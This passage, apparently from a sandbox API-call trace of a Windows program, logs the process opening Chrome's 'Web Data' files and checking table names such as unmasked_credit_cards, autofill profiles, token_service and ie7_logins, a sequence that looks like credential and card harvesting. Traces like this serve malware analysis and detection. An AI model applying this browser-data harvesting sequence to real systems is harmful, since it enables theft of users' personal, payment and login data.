dwLockType=0x0) returned 0x0 [0591.075] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.075] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.075] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.075] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x5d5258) returned 0x0 [0591.075] LocalFree (hMem=0x56ff38) returned 0x0 [0591.075] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.075] lstrcmpiA (lpString1="autofill_profile_emails", lpString2="autofill") returned 1 [0591.075] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.075] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.075] LocalFree (hMem=0x5d1978) returned 0x0 [0591.075] LocalFree (hMem=0x58d970) returned 0x0 [0591.075] LocalFree (hMem=0x596288) returned 0x0 [0591.075] LocalFree (hMem=0x56fe98) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0a8, libOffset=0x69da, cb=0x0, dwLockType=0x0) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x2edb848) returned 0x0 [0591.075] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.075] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.075] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.075] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.075] LocalFree (hMem=0x5d5258) returned 0x0 [0591.075] LocalFree (hMem=0x56fe98) returned 0x0 [0591.075] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.076] lstrcmpiA (lpString1="autofill_profile_phones", lpString2="autofill") returned 1 [0591.076] LocalFree (hMem=0x58d970) returned 0x0 [0591.076] LocalFree (hMem=0x5d1978) returned 0x0 [0591.076] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.076] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.076] LocalFree (hMem=0x596288) returned 0x0 [0591.076] LocalFree (hMem=0x56ff38) returned 0x0 [0591.076] IStream:LockRegion (This=0x63a0a8, libOffset=0x696a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.076] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.076] LocalFree (hMem=0x2edb848) returned 0x0 [0591.076] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.076] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.076] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.076] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.076] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.076] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.076] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.076] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.076] LocalFree (hMem=0x2ed7060) returned 0x0 [0591.076] LocalFree (hMem=0x56ff38) returned 0x0 [0591.076] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.076] lstrcmpiA (lpString1="autofill_profiles_trash", lpString2="autofill") returned 1 [0591.076] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.076] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.076] LocalFree (hMem=0x5d1978) returned 0x0 [0591.076] LocalFree (hMem=0x58d970) returned 0x0 [0591.076] LocalFree (hMem=0x5b7378) returned 0x0 [0591.076] LocalFree (hMem=0x56fe98) returned 0x0 [0591.076] IStream:LockRegion (This=0x63a0a8, libOffset=0x6f23, cb=0x0, dwLockType=0x0) returned 0x0 [0591.076] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.076] LocalFree (hMem=0x2edb848) returned 0x0 [0591.076] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.076] LocalAlloc (uFlags=0x40, uBytes=0x93) returned 0x56ffd8 [0591.076] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.076] LocalAlloc (uFlags=0x40, uBytes=0x93) returned 0x56ffd8 [0591.076] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.076] LocalFree (hMem=0x63ce38) returned 0x0 [0591.076] LocalFree (hMem=0x56fe98) returned 0x0 [0591.076] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.076] lstrcmpiA (lpString1="masked_credit_cards", lpString2="autofill") returned 1 [0591.076] LocalFree (hMem=0x58d970) returned 0x0 [0591.076] LocalFree (hMem=0x5d1978) returned 0x0 [0591.076] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.076] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.076] LocalFree (hMem=0x5e3098) returned 0x0 [0591.076] LocalFree (hMem=0x56ff38) returned 0x0 [0591.076] IStream:LockRegion (This=0x63a0a8, libOffset=0x6e29, cb=0x0, dwLockType=0x0) returned 0x0 [0591.076] LocalFree (hMem=0x2edb848) returned 0x0 [0591.076] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.076] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0591.076] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.076] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0591.076] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.076] LocalFree (hMem=0x5dc458) returned 0x0 [0591.077] LocalFree (hMem=0x56ff38) returned 0x0 [0591.077] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.077] lstrcmpiA (lpString1="unmasked_credit_cards", lpString2="autofill") returned 1 [0591.077] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.077] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.077] LocalFree (hMem=0x5d1978) returned 0x0 [0591.077] LocalFree (hMem=0x58d970) returned 0x0 [0591.077] LocalFree (hMem=0x2edb848) returned 0x0 [0591.077] LocalFree (hMem=0x56fe98) returned 0x0 [0591.077] IStream:LockRegion (This=0x63a0a8, libOffset=0x6895, cb=0x0, dwLockType=0x0) returned 0x0 [0591.077] LocalFree (hMem=0x2edb848) returned 0x0 [0591.077] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.077] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.077] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.077] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.077] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.077] LocalFree (hMem=0x63ea58) returned 0x0 [0591.077] LocalFree (hMem=0x56fe98) returned 0x0 [0591.077] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.077] lstrcmpiA (lpString1="server_card_metadata", lpString2="autofill") returned 1 [0591.077] LocalFree (hMem=0x58d970) returned 0x0 [0591.077] LocalFree (hMem=0x5d1978) returned 0x0 [0591.077] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.077] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.077] LocalFree (hMem=0x63ce38) returned 0x0 [0591.077] LocalFree (hMem=0x56ff38) returned 0x0 [0591.077] LocalFree (hMem=0x2eff7f8) returned 0x0 [0591.077] IStream:LockRegion (This=0x63a0a8, libOffset=0xb000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.077] LocalFree (hMem=0x2edb848) returned 0x0 [0591.077] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.077] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0591.077] LocalFree (hMem=0x58d970) returned 0x0 [0591.077] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0591.077] LocalFree (hMem=0x58d970) returned 0x0 [0591.077] LocalFree (hMem=0x2edb848) returned 0x0 [0591.077] LocalFree (hMem=0x56ff38) returned 0x0 [0591.077] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.077] lstrcmpiA (lpString1="server_addresses", lpString2="autofill") returned 1 [0591.077] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.077] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.077] LocalFree (hMem=0x570078) returned 0x0 [0591.077] LocalFree (hMem=0x58d970) returned 0x0 [0591.077] LocalFree (hMem=0x2edb9f0) returned 0x0 [0591.077] LocalFree (hMem=0x56fe98) returned 0x0 [0591.077] IStream:LockRegion (This=0x63a0a8, libOffset=0xb317, cb=0x0, dwLockType=0x0) returned 0x0 [0591.077] LocalFree (hMem=0x2edb848) returned 0x0 [0591.077] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.077] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.077] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.077] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.077] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.077] LocalFree (hMem=0x63ce38) returned 0x0 [0591.077] LocalFree (hMem=0x56fe98) returned 0x0 [0591.077] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.077] lstrcmpiA (lpString1="server_address_metadata", lpString2="autofill") returned 1 [0591.078] LocalFree (hMem=0x58d970) returned 0x0 [0591.078] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.078] LocalFree (hMem=0x5d1978) returned 0x0 [0591.078] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.078] LocalFree (hMem=0x5dc458) returned 0x0 [0591.078] LocalFree (hMem=0x570078) returned 0x0 [0591.078] IStream:LockRegion (This=0x63a0a8, libOffset=0xb22d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.078] LocalFree (hMem=0x2edb848) returned 0x0 [0591.078] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.078] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0591.078] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.078] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0591.078] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.078] LocalFree (hMem=0x2ed0148) returned 0x0 [0591.078] LocalFree (hMem=0x570078) returned 0x0 [0591.078] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.078] lstrcmpiA (lpString1="autofill_sync_metadata", lpString2="autofill") returned 1 [0591.078] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.078] LocalFree (hMem=0x5d1978) returned 0x0 [0591.078] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.078] LocalFree (hMem=0x58d970) returned 0x0 [0591.078] lstrcmpiA (lpString1="sqlite_autoindex_autofill_sync_metadata_1", lpString2="autofill") returned 1 [0591.078] lstrcmpiA (lpString1="autofill_model_type_state", lpString2="autofill") returned 1 [0591.078] lstrcmpiA (lpString1="token_service", lpString2="autofill") returned 1 [0591.078] lstrcmpiA (lpString1="sqlite_autoindex_token_service_1", lpString2="autofill") returned 1 [0591.078] lstrcmpiA (lpString1="ie7_logins", lpString2="autofill") returned 1 [0591.078] lstrcmpiA (lpString1="sqlite_autoindex_ie7_logins_1", lpString2="autofill") returned 1 [0591.078] lstrcmpiA (lpString1="ie7_logins_hash", lpString2="autofill") returned 1 [0591.078] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.078] lstrlenW (lpString="\\") returned 1 [0591.078] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0591.078] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5edae8 [0591.078] lstrlenW (lpString="Web Data-journal") returned 16 [0591.078] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0591.078] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63ce38 [0591.078] StrStrIW (lpFirst="Web Data-journal", lpSrch="web data") returned="Web Data-journal" [0591.078] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db74 | out: ppstm=0x52db74*=0x63a0a8) returned 0x0 [0591.078] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0591.079] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0591.079] ReadFile (in: hFile=0x660, lpBuffer=0x52cb6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb64, lpOverlapped=0x0 | out: lpBuffer=0x52cb6c*, lpNumberOfBytesRead=0x52cb64*=0x0, lpOverlapped=0x0) returned 1 [0591.079] CloseHandle (hObject=0x660) returned 1 [0591.079] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.079] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.079] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.079] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.079] lstrcmpiW (lpString1="EVWhitelist", lpString2=".") returned 1 [0591.079] lstrcmpiW (lpString1="EVWhitelist", lpString2="..") returned 1 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.079] lstrlenW (lpString="\\") returned 1 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.079] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.079] lstrlenW (lpString="EVWhitelist") returned 11 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.079] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed570 [0591.079] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 67 [0591.079] lstrlenW (lpString="\\*.*") returned 4 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 67 [0591.079] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5edae8 [0591.079] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.079] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.079] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.079] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.079] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.079] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.079] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.079] LocalFree (hMem=0x5edae8) returned 0x0 [0591.079] LocalFree (hMem=0x5ed570) returned 0x0 [0591.079] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.079] lstrcmpiW (lpString1="FileTypePolicies", lpString2=".") returned 1 [0591.079] lstrcmpiW (lpString1="FileTypePolicies", lpString2="..") returned 1 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.079] lstrlenW (lpString="\\") returned 1 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.079] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.079] lstrlenW (lpString="FileTypePolicies") returned 16 [0591.079] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.079] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63ea58 [0591.079] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 72 [0591.080] lstrlenW (lpString="\\*.*") returned 4 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 72 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eb80 [0591.080] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.080] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.080] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.080] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.080] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.080] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.080] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.080] LocalFree (hMem=0x63eb80) returned 0x0 [0591.080] LocalFree (hMem=0x63ea58) returned 0x0 [0591.080] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.080] lstrlenW (lpString="\\") returned 1 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.080] lstrlenW (lpString="First Run") returned 9 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed570 [0591.080] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.080] StrStrIW (lpFirst="First Run", lpSrch="web data") returned 0x0 [0591.080] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.080] lstrlenW (lpString="\\") returned 1 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.080] lstrlenW (lpString="Local State") returned 11 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5edae8 [0591.080] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.080] StrStrIW (lpFirst="Local State", lpSrch="web data") returned 0x0 [0591.080] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.080] lstrcmpiW (lpString1="OriginTrials", lpString2=".") returned 1 [0591.080] lstrcmpiW (lpString1="OriginTrials", lpString2="..") returned 1 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.080] lstrlenW (lpString="\\") returned 1 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.080] lstrlenW (lpString="OriginTrials") returned 12 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5ed7a0 [0591.080] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 68 [0591.080] lstrlenW (lpString="\\*.*") returned 4 [0591.080] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 68 [0591.080] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x63ea58 [0591.080] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.080] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.080] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.080] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.081] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.081] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.081] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.081] LocalFree (hMem=0x63ea58) returned 0x0 [0591.081] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.081] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.081] lstrcmpiW (lpString1="PepperFlash", lpString2=".") returned 1 [0591.081] lstrcmpiW (lpString1="PepperFlash", lpString2="..") returned 1 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.081] lstrlenW (lpString="\\") returned 1 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.081] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.081] lstrlenW (lpString="PepperFlash") returned 11 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.081] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed7a0 [0591.081] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 67 [0591.081] lstrlenW (lpString="\\*.*") returned 4 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 67 [0591.081] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5edc00 [0591.081] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.081] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.081] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.081] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.081] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.081] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.081] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.081] LocalFree (hMem=0x5edc00) returned 0x0 [0591.081] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.081] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.081] lstrcmpiW (lpString1="pnacl", lpString2=".") returned 1 [0591.081] lstrcmpiW (lpString1="pnacl", lpString2="..") returned 1 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.081] lstrlenW (lpString="\\") returned 1 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.081] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x63f8c8 [0591.081] lstrlenW (lpString="pnacl") returned 5 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.081] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0x5e5080 [0591.081] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 61 [0591.081] lstrlenW (lpString="\\*.*") returned 4 [0591.081] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 61 [0591.081] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed7a0 [0591.081] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.081] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.081] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.081] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.082] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.082] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.082] LocalFree (hMem=0x5e5080) returned 0x0 [0591.082] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.082] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0591.082] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.082] lstrlenW (lpString="\\") returned 1 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.082] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e3098 [0591.082] lstrlenW (lpString="SSLErrorAssistant") returned 17 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.082] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x63ea58 [0591.082] LocalFree (hMem=0x5e3098) returned 0x0 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 73 [0591.082] lstrlenW (lpString="\\*.*") returned 4 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 73 [0591.082] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x63eb80 [0591.082] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.082] lstrcmpiW (lpString1=".", lpString2=".") 